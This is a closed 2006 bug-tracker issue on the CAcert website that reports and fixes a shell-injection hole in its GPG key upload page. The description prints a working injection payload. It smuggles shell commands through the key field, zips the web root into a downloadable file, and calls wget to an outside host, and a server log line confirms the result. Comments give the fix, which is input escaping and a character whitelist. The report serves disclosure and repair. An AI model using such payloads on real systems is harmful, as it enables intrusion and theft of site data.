View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0000245 | Main CAcert Website | GPG/PGP | public | 2006-05-28 21:15 | 2013-11-20 22:23 |
| Reporter | TheSourcerer | Assigned To | |||
| Priority | normal | Severity | block | Reproducibility | always |
| Status | closed | Resolution | fixed | ||
| Fixed in Version | 2006 | ||||
| Summary | 0000245: Shell escape | ||||
| Description | The following GPG keys can be used to exploit a hole in the system: "; echo "Hi" >/tmp/test ; echo " "; zip -r /www/www/leak.zip /www ; echo " " ; wget http://www2.futureware.at/HoleInOne ; echo " results in the following request: 72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2" The hole is in the www/gpg.php line 45 | ||||
| Tags | No tags attached. | ||||
| Reviewed by | |||||
| Test Instructions | |||||
| related to | 0000148 | closed | site shouldn't rely on magic_quotes_gpc turned on |
|
|
This exploit was not possible some weeks ago. Updating the php might have introduced configuration changes. Seems to me as if magic_quotes_gpc has been turned off (thats Debian default) or magic_quotes_sybase as been turn on aswell (which would break the functionallity of magic_quotes_gpc). Possible solution: 1. turn on magic_quotes_gpc in php configuration 2. make sure magic_quotes_sybase is turned off 3. add something like function check_quotes($value) { return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value); } |
|
|
Line 44 actually... - $gpgkey = $_POST['CSR']; + $gpgkey = escapeshellarg($_POST['CSR']); |
|
|
escapeshellarg breaks gpg keys, instead a new functions was created to only allow base64 chars... function clean_csr($CSR) { return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR)); } $gpgkey = clean_csr(stripslashes($_REQUEST['CSR'])); |
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2006-05-28 21:15 | TheSourcerer | New Issue | |
| 2006-05-28 21:51 |
|
Relationship added | related to 0000148 |
| 2006-05-28 22:06 |
|
Note Added: 0000234 | |
| 2006-05-28 23:13 | duane | Note Added: 0000235 | |
| 2006-05-28 23:55 | duane | Note Added: 0000236 | |
| 2006-05-28 23:56 | duane | Status | new => closed |
| 2006-05-28 23:56 | duane | Resolution | open => fixed |
| 2006-05-28 23:56 | duane | Fixed in Version | => production |
| 2006-05-29 00:03 | duane | Note Edited: 0000236 | |
| 2013-01-14 08:46 | Werner Dworak | Fixed in Version | => 2006 |
| 2013-11-20 22:23 | NEOatNHNG | View Status | private => public |
